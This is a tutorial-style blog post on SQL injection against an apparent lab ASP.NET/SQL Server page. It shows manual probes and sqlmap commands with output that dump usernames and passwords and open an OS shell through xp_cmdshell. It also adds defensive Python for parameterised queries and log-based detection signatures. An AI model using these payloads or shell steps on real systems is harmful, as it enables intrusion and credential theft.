1 Manual injection
1. Determine whether an injection point exists.
Appending a single quote produces a database error, so error-based injection is present.
http://bug.cc:8201/get.aspx?id=1'
and 1=1 displays the page normally, and 1=2 returns no data, so boolean-based injection is present.
http://bug.cc:8201/get.aspx?id=1 and 1=1
Appending / displays normally; appending -0 displays an error.
2. Identify the database type. A normal response means the backend is MSSQL (i.e. SQL Server): and (select count(*) from sysobjects)>0
http://bug.cc:8201/get.aspx?id=1 and (select count(*) from sysobjects)>0
3. Determine the number of columns: order by 4. Trial and error shows there are 4 columns.
http://bug.cc:8201/get.aspx?id=1 order by 4
4.
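As an added example that is not part of the original post: the three manual probes above (the quote, and 1=1 / and 1=2, order by N) only work because the id parameter is pasted straight into the SQL text. The page does not show the source of get.aspx, so the Python below assumes that concatenation pattern, rebuilds the page's test.users table in an in-memory SQLite database (a stand-in for SQL Server; the behaviours probed here are the same), and puts the hardened form beside it: validate the type, then bind the value as a parameter, so the same inputs are rejected before any SQL runs. The function names are ours.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the page's test.users table (SQLite, not SQL Server)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT, age INTEGER)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [(1, "admin1", "admin2", 30), (2, "admin2", "admin2", 31)],
    )
    return conn


def vulnerable_get(conn, raw_id):
    """Assumed pattern behind get.aspx: the raw id parameter is concatenated into the query."""
    sql = "SELECT id, name, password, age FROM users WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def safe_get(conn, raw_id):
    """Hardened form: validate the type first, then bind the value as a parameter."""
    id_value = int(raw_id)  # "1 and 1=1" or "1'" raises ValueError before any SQL runs
    sql = "SELECT id, name, password, age FROM users WHERE id=?"
    return conn.execute(sql, (id_value,)).fetchall()


def probe(conn, raw_id):
    """Classify the response the way the page's boolean test does: 'ok', 'empty' or 'error'."""
    try:
        rows = vulnerable_get(conn, raw_id)
    except sqlite3.Error:
        return "error"          # the quote and "order by 5" land here
    return "ok" if rows else "empty"   # "and 1=1" vs "and 1=2"


def safe_probe(conn, raw_id):
    """Same classification against the hardened handler: injection input is 'rejected'."""
    try:
        rows = safe_get(conn, raw_id)
    except ValueError:
        return "rejected"
    return "ok" if rows else "empty"


if __name__ == "__main__":
    db = make_db()
    for candidate in ["1", "1'", "1 and 1=1", "1 and 1=2", "1 order by 4", "1 order by 5"]:
        print(f"{candidate!r:20} concatenated={probe(db, candidate):6} bound={safe_probe(db, candidate)}")
```

The point of the side-by-side output is that the three signals the manual test relies on (error, normal, empty) come from the database interpreting the parameter as SQL; once the parameter is an integer bound by the driver, every probe collapses to "rejected" and the column count is never observable.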
2 Tool-based injection
2.1 sqlmap
The steps are as follows:
1. Test the injection point: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1'
2. Get the current database: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --current-db
3. Get the current user: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --current-user
4. Check for administrator (DBA) privileges: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --is-dba
5. List the database tables: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test --tables
6. List the columns of a table: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test -T users --columns
7. Dump the table data: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test -T users -C name,password --dump
8. Execute commands: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --os-shell
1. Test the injection point: sqlmap -u "http://192.168.5.186:8201/get.aspx?id=1"
Result:
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 9842=9842

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=1;WAITFOR DELAY '0:0:5'--

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF)
    Payload: id=1 WAITFOR DELAY '0:0:5'

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT NULL,CHAR(113)+CHAR(112)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(111)+CHAR(119)+CHAR(122)+CHAR(109)+CHAR(83)+CHAR(70)+CHAR(74)+CHAR(121)+CHAR(111)+CHAR(99)+CHAR(71)+CHAR(121)+CHAR(79)+CHAR(90)+CHAR(65)+CHAR(87)+CHAR(89)+CHAR(102)+CHAR(82)+CHAR(83)+CHAR(120)+CHAR(99)+CHAR(65)+CHAR(104)+CHAR(119)+CHAR(82)+CHAR(107)+CHAR(82)+CHAR(112)+CHAR(120)+CHAR(68)+CHAR(68)+CHAR(97)+CHAR(97)+CHAR(81)+CHAR(112)+CHAR(88)+CHAR(98)+CHAR(113)+CHAR(77)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(106)+CHAR(113),NULL,NULL-- ouYA
---
[03:08:54] [INFO] testing Microsoft SQL Server
[03:08:55] [INFO] confirming Microsoft SQL Server
[03:08:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 7 or 2008 R2
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
2. Get the current database: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --current-db
current database: 'test'
3. Get the current user: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --current-user
current user: 'sa'
4. Check for administrator (DBA) privileges: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --is-dba
current user is DBA: True
5. List the database tables: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test --tables
Database: test
[3 tables]
+--------------+
| cmd          |
| sqlmapoutput |
| users        |
+--------------+
6. List the columns of a table: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test -T users --columns
Database: test
Table: users
[4 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| age      | int     |
| id       | int     |
| name     | varchar |
| password | varchar |
+----------+---------+
7. Dump the table data: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test -T users -C name,password --dump
Database: test
Table: users
[2 entries]
+--------+----------+
| name   | password |
+--------+----------+
| admin1 | admin2   |
| admin2 | admin2   |
+--------+----------+
8. Execute commands: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --os-shell
└─# sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --os-shell
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.6.7#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:21:03 /2022-12-29/

[03:21:03] [INFO] resuming back-end DBMS 'microsoft sql server'
[03:21:03] [INFO] testing connection to the target URL
[03:21:04] [INFO] heuristics detected web page charset 'utf-8'
[03:21:04] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 9842=9842

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=1;WAITFOR DELAY '0:0:5'--

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF)
    Payload: id=1 WAITFOR DELAY '0:0:5'

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT NULL,CHAR(113)+CHAR(112)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(111)+CHAR(119)+CHAR(122)+CHAR(109)+CHAR(83)+CHAR(70)+CHAR(74)+CHAR(121)+CHAR(111)+CHAR(99)+CHAR(71)+CHAR(121)+CHAR(79)+CHAR(90)+CHAR(65)+CHAR(87)+CHAR(89)+CHAR(102)+CHAR(82)+CHAR(83)+CHAR(120)+CHAR(99)+CHAR(65)+CHAR(104)+CHAR(119)+CHAR(82)+CHAR(107)+CHAR(82)+CHAR(112)+CHAR(120)+CHAR(68)+CHAR(68)+CHAR(97)+CHAR(97)+CHAR(81)+CHAR(112)+CHAR(88)+CHAR(98)+CHAR(113)+CHAR(77)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(106)+CHAR(113),NULL,NULL-- ouYA
---
[03:21:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[03:21:04] [WARNING] reflective value(s) found and filtering out
[03:21:04] [INFO] testing if current user is DBA
[03:21:04] [INFO] checking if xp_cmdshell extended procedure is available, please wait..
[03:21:13] [INFO] xp_cmdshell extended procedure is available
[03:21:13] [INFO] testing if xp_cmdshell extended procedure is usable
[03:21:13] [INFO] xp_cmdshell extended procedure is usable
[03:21:13] [INFO] going to use extended procedure 'xp_cmdshell' for operating system command execution
[03:21:13] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a]
command standard output: 'nt authority\network service'
os-shell> net user
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
\\ 的用户帐户
-------------------------------------------------------------------------------
Administrator            Guest
命令运行完毕,但发生一个或多个错误。
---
os-shell> net user test 123.com /add
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
发生系统错误 5。
拒绝访问。
---
os-shell>
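Added example, not from the original post: every probe in this walkthrough (the quote, and 1=1, the sysobjects check, order by, and sqlmap's WAITFOR DELAY, stacked-query and UNION/CHAR() payloads) is recorded in the web server's request log, even when, as in the run above, the WAF/IPS that sqlmap reported did not stop it. The Python below is a small detector for that log. It assumes IIS W3C log lines in the default field order (date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken), decodes the query string once, and flags the patterns shown on this page plus the combination of a quote in the parameter and a 5xx response, which is the first manual probe. The log lines are constructed to mirror the requests above and are not the real server's log; signature names and function names are ours.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the probes and payloads that appear in this walkthrough, applied
# to the decoded cs-uri-query field. The names are our own labels.
SIGNATURES = [
    ("boolean-test",   re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("mssql-catalog",  re.compile(r"\bsysobjects\b", re.I)),
    ("time-delay",     re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("union-select",   re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("char-chain",     re.compile(r"(char\(\d+\)\s*\+\s*){3,}", re.I)),
    ("stacked-query",  re.compile(r";\s*(waitfor|exec|declare|select)\b", re.I)),
    ("xp_cmdshell",    re.compile(r"\bxp_cmdshell\b", re.I)),
]

# Constructed sample log in IIS W3C format (default field order). These lines are
# made up to mirror the requests in the walkthrough; they are not a real log.
SAMPLE_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken",
    "2022-12-29 03:08:50 192.168.5.186 GET /get.aspx id=1 8201 - 192.168.5.10 Mozilla/5.0 - 200 0 0 12",
    "2022-12-29 03:08:51 192.168.5.186 GET /get.aspx id=1%27 8201 - 192.168.5.10 Mozilla/5.0 - 500 0 0 9",
    "2022-12-29 03:08:52 192.168.5.186 GET /get.aspx id=1+and+1%3D1 8201 - 192.168.5.10 Mozilla/5.0 - 200 0 0 11",
    "2022-12-29 03:08:53 192.168.5.186 GET /get.aspx id=1+and+(select+count(*)+from+sysobjects)%3E0 8201 - 192.168.5.10 Mozilla/5.0 - 200 0 0 14",
    "2022-12-29 03:08:54 192.168.5.186 GET /get.aspx id=1+order+by+4 8201 - 192.168.5.10 Mozilla/5.0 - 200 0 0 10",
    "2022-12-29 03:08:55 192.168.5.186 GET /get.aspx id=1%3BWAITFOR+DELAY+%270%3A0%3A5%27-- 8201 - 192.168.5.10 sqlmap/1.6.7 - 200 0 0 5021",
    "2022-12-29 03:08:56 192.168.5.186 GET /get.aspx id=1+UNION+ALL+SELECT+NULL%2CCHAR(113)%2BCHAR(112)%2BCHAR(106)%2BCHAR(112)%2CNULL%2CNULL-- 8201 - 192.168.5.10 sqlmap/1.6.7 - 200 0 0 13",
]


def scan_line(line):
    """Return the signature names that fire on one log line ([] for headers or clean lines)."""
    fields = line.split(" ")
    if line.startswith("#") or len(fields) < 6:
        return []
    # Decode exactly once: a second pass would turn the '+' in CHAR(113)+CHAR(112) into spaces.
    query = unquote_plus(fields[5])
    hits = [name for name, rx in SIGNATURES if rx.search(query)]
    # A quote in the parameter followed by a server error is the classic first probe.
    status = fields[11] if len(fields) > 11 else ""
    if "'" in query and status.startswith("5"):
        hits.append("quote-then-5xx")
    return hits


def scan_log(lines):
    """Return [(client_ip, raw_query, [hits]), ...] for every line with at least one hit."""
    alerts = []
    for line in lines:
        hits = scan_line(line)
        if hits:
            fields = line.split(" ")
            client_ip = fields[8] if len(fields) > 8 else "?"
            alerts.append((client_ip, fields[5], hits))
    return alerts


if __name__ == "__main__":
    for ip, query, hits in scan_log(SAMPLE_LOG):
        print(f"{ip:15} {', '.join(hits):28} {query}")
```

Two things in the walkthrough's own output decide how far this goes once a request like these gets through: --is-dba came back True because the application connects as sa, and xp_cmdshell was available. With a login that holds only SELECT on the application's tables, the same injection would still leak data but the "testing if current user is DBA" step would fail and --os-shell would have nothing to call, so the alert from the detector above should be paired with a check of which SQL Server login the web application uses.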
From: https://www.cnblogs.com/snow2021/p/17012997.html